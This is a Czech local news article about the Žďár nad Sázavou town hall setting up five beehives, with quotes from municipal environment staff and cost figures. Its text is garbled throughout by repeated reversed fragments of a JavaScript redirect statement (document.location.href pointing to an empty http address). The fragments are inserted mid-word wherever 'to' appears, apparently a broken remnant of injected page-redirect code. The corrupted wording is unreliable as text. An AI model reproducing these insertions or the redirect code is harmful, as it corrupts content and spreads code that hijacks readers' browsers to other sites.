Rainbow page separator

Žďárská radnice se dala na včelaření, první med bude napřesrok

Sobota, 23. července 2022

Žďár nad Sázavou / Vlastní med coby propagační předmět charakterizující měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude moci využívat žďárská radnice. Ale až příští rok. Pod městským úřadem bylo k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu na základě nápadu tamního ekotýmu nainstalováno pět včelích úlů. Jejich osazenstvo, tedy pět mladých včelstev, měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zakoupilo od včelaře Milana Dvořáčka ze Sazomína, který se zároveň bude o městské včely starat. „Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos se budou včely adap[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat na nové stanoviště a připravovat na zimu. Včelař je bude přikrmovat cukerným roz[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokem a preventivně ošetřovat proti parazitům,” uvedla Tereza Dejmalová z odboru životního prostředí žďárského městského úřadu.
Úly pod úřadem jsou označeny výstražnou cedulí a mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pro ně vybrali včelaři s ohledem na dostupnost kve[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toucích stromů, květina a zahrádek. „Rádi bychom tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem podporovali a propagovali včelaření, v plánu jsou třeba i exkurze. Do budoucna uvažujeme o takzvaném on-line úlu s webkamerou,” doplnila Hana Daďourková ze žďárského odboru životního prostředí.
Počáteční náklady na pořízení úlů a včelstev včetně péče o ně byly vyčísleny na 44 tisíc korun, v dalších letech budou výrazně nižší. Běžný roční průměr je podle včelařů kolem dvacet kilo medu na včelstvo, záleží však na podmínkách a taktéž počasí.